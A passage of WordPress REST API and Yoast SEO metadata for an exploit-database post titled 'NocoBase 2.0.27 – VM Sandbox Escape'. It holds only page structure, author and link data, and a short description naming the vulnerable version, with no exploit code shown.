– VM Sandbox Escape_EDB-ID:52552\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"NocoBase 2.0.27 - VM Sandbox Escape_EDB-ID:52552 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=52110","og_locale":"en_US","og_type":"article","og_title":"NocoBase 2.0.27 - VM Sandbox Escape_EDB-ID:52552 - zero redgem","og_description":"{“lastseen”:”2026-05-07T15:27:58″,”description”:”Exploit Title: NocoBase 2.0.27 – VM Sandbox Escape Date: 2026-03-26 Exploit Author: Onurcan Gen\u00e7 Vendor Homepage: https:\/\/www.nocobase.com\/ Software Link: https:\/\/github.com\/nocobase\/nocobase Version: = 2.0.27 \u2014 patched...","og_url":"https:\/\/zero.redgem.net\/?p=52110","og_site_name":"zero redgem","article_published_time":"2026-05-07T10:34:45+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"14 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=52110#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=52110"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"NocoBase 2.0.27 – VM Sandbox Escape_EDB-ID:52552","datePublished":"2026-05-07T10:34:45+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=52110"},"wordCount":2776,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.9","exploit","exploitdb","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=52110#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=52110","url":"https:\/\/zero.redgem.net\/?p=52110","name":"NocoBase 2.0.27 - VM Sandbox Escape_EDB-ID:52552 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-07T10:34:45+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=52110#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=52110"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=52110#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"NocoBase 2.0.27 – VM Sandbox Escape_EDB-ID:52552"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/52110","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=52110"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/52110\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=52110"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=52110"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=52110"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}